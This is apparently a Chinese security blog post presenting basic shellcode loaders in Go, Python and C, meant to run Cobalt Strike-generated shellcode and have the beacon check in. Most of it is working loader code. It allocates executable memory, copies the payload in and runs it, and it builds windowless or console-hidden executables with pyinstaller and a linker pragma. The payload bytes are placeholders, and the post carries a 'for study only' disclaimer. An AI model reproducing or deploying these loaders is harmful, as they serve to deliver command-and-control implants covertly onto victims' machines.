其他
多种基础Shellcode加载器
关注本公众号,长期推送漏洞文章
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
/ Shellcode加载器 /
GoShellcode
使用cs生成shellcode
替换
去空格
def remove_whitespace_and_newlines(text): text_without_spaces = text.replace(" ", "")
text_without_newlines = text_without_spaces.replace( "\n", "").replace("\r", "")
return text_without_newlines
input_text = """ shellcode """
output_text = remove_whitespace_and_newlines(input_text)print(output_text)
Go语言
package mainimport ( "io/ioutil" "os" "syscall" "unsafe")const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40)var ( kernel32 = syscall.MustLoadDLL("kernel32.dll") ntdll = syscall.MustLoadDLL("ntdll.dll") VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") shellcode_buf = []byte{ 0xfc, 0x48, ----shellcode----, 0xd5, })func checkErr(err error) { if err != nil { if err.Error() != "The operation completed successfully." { println(err.Error()) os.Exit(1) } }}func main() { shellcode := shellcode_buf if len(os.Args) > 1 { shellcodeFileData, err := ioutil.ReadFile(os.Args[1]) checkErr(err) shellcode = shellcodeFileData } addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) if addr == 0 { checkErr(err) } _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) checkErr(err) syscall.Syscall(addr, 0, 0, 0, 0)}测试上线
PythonShellcode
#!/usr/bin/pythonimport ctypesshellcode = bytearray("\xfc\xe8")ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))进行编译
python pyinstaller.py -F -w pyshellcode.pyC/C++Shellcode
unsigned char buf[] = "shellcode";#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口main(){ ( (void(*)(void))&buf)();}